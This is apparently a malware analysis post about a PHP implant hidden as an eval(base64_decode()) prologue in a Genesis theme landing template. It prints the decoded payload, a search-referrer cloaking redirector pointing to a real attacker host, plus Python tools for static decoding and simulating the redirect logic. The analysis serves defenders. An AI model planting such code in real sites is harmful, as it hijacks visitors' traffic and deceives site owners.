An analysis of a PHP implant I came across on VirusTotal Intelligence.
```php
<?php eval(base64_decode("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"));
/**
 * This file adds the Landing template to the Agency Theme.
 *
 * @author StudioPress
 * @package Agency
 * @subpackage Customizations
 */

/* Template Name: Landing */

// Add custom body class to the head
add_filter( 'body_class', 'add_body_class' );
function add_body_class( $classes ) {
    $classes[] = 'agency-landing';
    return $classes;
}

// Remove header, navigation, breadcrumbs, footer widgets, footer
add_filter( 'genesis_pre_get_option_site_layout', '__genesis_return_full_width_content' );
remove_action( 'genesis_header', 'genesis_header_markup_open', 5 );
remove_action( 'genesis_header', 'genesis_do_header' );
remove_action( 'genesis_header', 'genesis_header_markup_close', 15 );
remove_action( 'genesis_after_header', 'genesis_do_nav' );
remove_action( 'genesis_after_header', 'genesis_do_subnav' );
remove_action( 'genesis_before_content_sidebar_wrap', 'genesis_do_breadcrumbs' );
remove_action( 'genesis_before_footer', 'genesis_footer_widget_areas' );
remove_action( 'genesis_footer', 'genesis_footer_markup_open', 5 );
remove_action( 'genesis_footer', 'genesis_do_footer' );
remove_action( 'genesis_footer', 'genesis_footer_markup_close', 15 );

genesis();
```
On an initial investigation of the file it is pretty obvious there is something funky going on: spot the eval() right at the beginning of the code, squeezed in front of what is otherwise a legitimate-looking StudioPress Genesis landing template. The template code is the camouflage; the eval(base64_decode(...)) prologue is the implant.

The decoded eval payload looks like this:
```php
<?php
error_reporting(0);               // silence notices, e.g. when HTTP_REFERER is absent
$qazplm = headers_sent();
if (!$qazplm) {                   // can only redirect if no output has been sent yet
    $referer = $_SERVER['HTTP_REFERER'];
    $uag = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {                   // require a User-Agent
        // skip old Internet Explorer versions
        if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
            // only visitors arriving from search engines, social sites or URL shorteners
            if (stristr($referer, "yahoo")
                or stristr($referer, "bing")
                or stristr($referer, "rambler")
                or stristr($referer, "live.com")
                or stristr($referer, "webalta")
                or stristr($referer, "bit.ly")
                or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url\?sa/", $referer)
                or stristr($referer, "myspace.com")
                or stristr($referer, "facebook.com/l")
                or stristr($referer, "aol.com")) {
                // intended to skip cached-copy / inurl: searches, but note the "or"
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://ibontu.25u.com/");
                    exit();
                }
            }
        }
    }
}
```
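The decoding above was done by hand; when triaging a theme directory you want to do it without ever running the PHP. The following Python script is an added example (not from the original post or from the sample) that statically peels nested eval(base64_decode("...")) layers and pulls the first indicators an analyst looks for (redirect targets, error suppression, Referer/User-Agent gating). The embedded PHP samples, the function names and the example.invalid target are constructed for the demonstration and are not the VirusTotal file.

```python
import base64
import binascii
import re
from typing import Dict, List

# Constructed samples (not the VirusTotal file): a benign stand-in for the implant's
# inner layer, wrapped once and twice in eval(base64_decode("...")) prologues, so the
# script runs offline. Nothing here is executed, only decoded.
INNER_PHP = (b'<?php error_reporting(0); '
             b'if (stristr($_SERVER["HTTP_REFERER"], "google")) '
             b'{ header("Location: http://example.invalid/"); exit(); }')


def wrap(php: bytes) -> bytes:
    """Build an eval(base64_decode("...")) prologue followed by decoy template code."""
    return (b'<?php eval(base64_decode("' + base64.b64encode(php) + b'")); '
            b'/* Template Name: Landing */ genesis();')


SAMPLE_PHP = wrap(INNER_PHP)
NESTED_PHP = wrap(wrap(INNER_PHP))

# Matches eval(base64_decode("...")) with either quote style and optional whitespace.
EVAL_B64 = re.compile(
    rb'eval\s*\(\s*base64_decode\s*\(\s*(["\'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)', re.I)


def extract_layers(php: bytes, max_depth: int = 8) -> List[bytes]:
    """Peel nested eval(base64_decode()) layers statically, without ever running PHP."""
    layers: List[bytes] = []
    current = php
    for _ in range(max_depth):
        m = EVAL_B64.search(current)
        if not m:
            break
        b64 = re.sub(rb'\s+', b'', m.group(2))
        try:
            decoded = base64.b64decode(b64, validate=True)
        except binascii.Error:
            break  # not real base64 (e.g. a decoy); stop rather than guess
        layers.append(decoded)
        current = decoded
    return layers


def indicators(decoded: bytes) -> Dict[str, object]:
    """The first things to pull from a decoded layer: redirect targets and request gating."""
    text = decoded.decode("latin-1")
    return {
        "locations": re.findall(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']', text, re.I),
        "suppresses_errors": re.search(r"error_reporting\s*\(\s*0\s*\)", text) is not None,
        "checks_referer": "HTTP_REFERER" in text,
        "checks_user_agent": "HTTP_USER_AGENT" in text,
    }


def triage(php: bytes) -> Dict[str, object]:
    """Decode every layer and report indicators from the innermost one."""
    layers = extract_layers(php)
    if not layers:
        return {"layers": 0, "indicators": None}
    return {"layers": len(layers), "indicators": indicators(layers[-1])}


if __name__ == "__main__":
    import sys
    # Pass a suspicious PHP file as argv[1]; with no argument the nested sample is used.
    target = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else NESTED_PHP
    print(triage(target))
```

The regex deliberately stops at the first layer that is not clean base64 instead of trying to repair it; a sample that needs more than that (gzinflate, str_rot13, variable-function tricks) should go into a sandboxed PHP interpreter, not through a guessing decoder.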
A quick glance over the script shows it is a ‘redirector’: its whole purpose is to send traffic to an alternative location, in this case header("Location: http://ibontu.25u.com/");

It does not redirect everyone, though. The redirect only fires when the request carries a Referer from a search engine, social network or URL shortener (Yahoo, Bing, Rambler, Yandex, Google result pages, the Facebook link redirector, bit.ly, tinyurl.com and so on), the User-Agent is present and is not MSIE 6.0/7.0, and no output has been sent yet (headers_sent()). Search-engine crawlers and direct visitors arrive without such a Referer, so they keep seeing the legitimate landing template and the page stays indexed, while humans clicking through from search results are bounced to the attacker's site. The final check is meant to skip cached-copy and inurl: searches, but it uses or where and was evidently intended, so it only suppresses the redirect when the Referer contains both "cache" and "inurl". error_reporting(0) hides the notices that would otherwise leak when those headers are missing.
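To see exactly who gets bounced, here is the gating logic of the decoded sample re-expressed in Python and run over a handful of constructed requests. This is an added example, not code from the post or from the implant; the request samples and the victim.example host are made up, and the only value taken from the sample is the redirect target.

```python
import re
from typing import Dict, Optional

REDIRECT_TARGET = "http://ibontu.25u.com/"   # destination from the decoded sample

# Referer tests copied from the decoded layer: stristr() is case-insensitive,
# the two preg_match() patterns are case-sensitive (no /i flag).
REFERER_SUBSTRINGS = ("yahoo", "bing", "rambler", "live.com", "webalta", "bit.ly",
                      "tinyurl.com", "myspace.com", "facebook.com/l", "aol.com")
REFERER_PATTERNS = (re.compile(r"yandex\.ru/yandsearch\?(.*?)&lr="),
                    re.compile(r"google\.(.*?)/url\?sa"))


def would_redirect(headers: Dict[str, str], headers_sent: bool = False) -> Optional[str]:
    """Return the redirect target if the implant would bounce this request, else None."""
    if headers_sent:                       # headers_sent() gate
        return None
    referer = headers.get("Referer", "")   # missing key is null in PHP; stristr() is then false
    ua = headers.get("User-Agent", "")
    if not ua:                             # if ($uag)
        return None
    ua_l = ua.lower()
    if "msie 7.0" in ua_l or "msie 6.0" in ua_l:
        return None
    ref_l = referer.lower()
    from_search = (any(s in ref_l for s in REFERER_SUBSTRINGS)
                   or any(p.search(referer) for p in REFERER_PATTERNS))
    if not from_search:
        return None
    # Faithful to the sample: `!stristr(cache) or !stristr(inurl)` is false only when
    # BOTH words appear, so the intended "skip cached copies" exclusion rarely fires.
    if "cache" not in ref_l or "inurl" not in ref_l:
        return REDIRECT_TARGET
    return None


CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36"
IE7 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"

# Constructed requests (not captured traffic) covering each branch of the gate.
SAMPLE_REQUESTS: Dict[str, Dict[str, str]] = {
    "googlebot_crawl": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1)"},
    "direct_visit": {"User-Agent": CHROME},
    "from_google_results": {"User-Agent": CHROME,
                            "Referer": "https://www.google.com/url?sa=t&url=https%3A%2F%2Fvictim.example%2F"},
    "from_bing_ie7": {"User-Agent": IE7, "Referer": "https://www.bing.com/search?q=victim"},
    "from_yandex": {"User-Agent": CHROME, "Referer": "https://yandex.ru/yandsearch?text=victim&lr=213"},
    "cache_only": {"User-Agent": CHROME, "Referer": "https://www.google.com/url?sa=t&q=cache:victim.example"},
    "cache_and_inurl": {"User-Agent": CHROME, "Referer": "https://www.google.com/url?sa=t&q=cache:inurl:victim"},
    "no_user_agent": {"Referer": "https://search.yahoo.com/search?p=victim"},
}


def classify_all() -> Dict[str, Optional[str]]:
    """Run every sample request through the gate."""
    return {name: would_redirect(h) for name, h in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, target in classify_all().items():
        print(f"{name:22} -> {target or 'serves real page'}")
```

Run it and the split is obvious: the crawler and the direct visitor are served the real template, the Chrome user arriving from Google or Yandex is bounced, and the cache_only request is bounced too because of the or bug; only the contrived cache_and_inurl Referer escapes. The same table is a useful reproduction recipe when you want to confirm a suspected redirector on a live site with curl and a forged Referer.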
Crude, but effective – somewhat :/
References
VirusTotal
Obfuscated - https://www.virustotal.com/en/file/dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee/analysis/
DeObfuscated - https://www.virustotal.com/en/file/66899269383bd479b0e29a5136e496bbd8d068daf514909bf7b2f30174dac0b9/analysis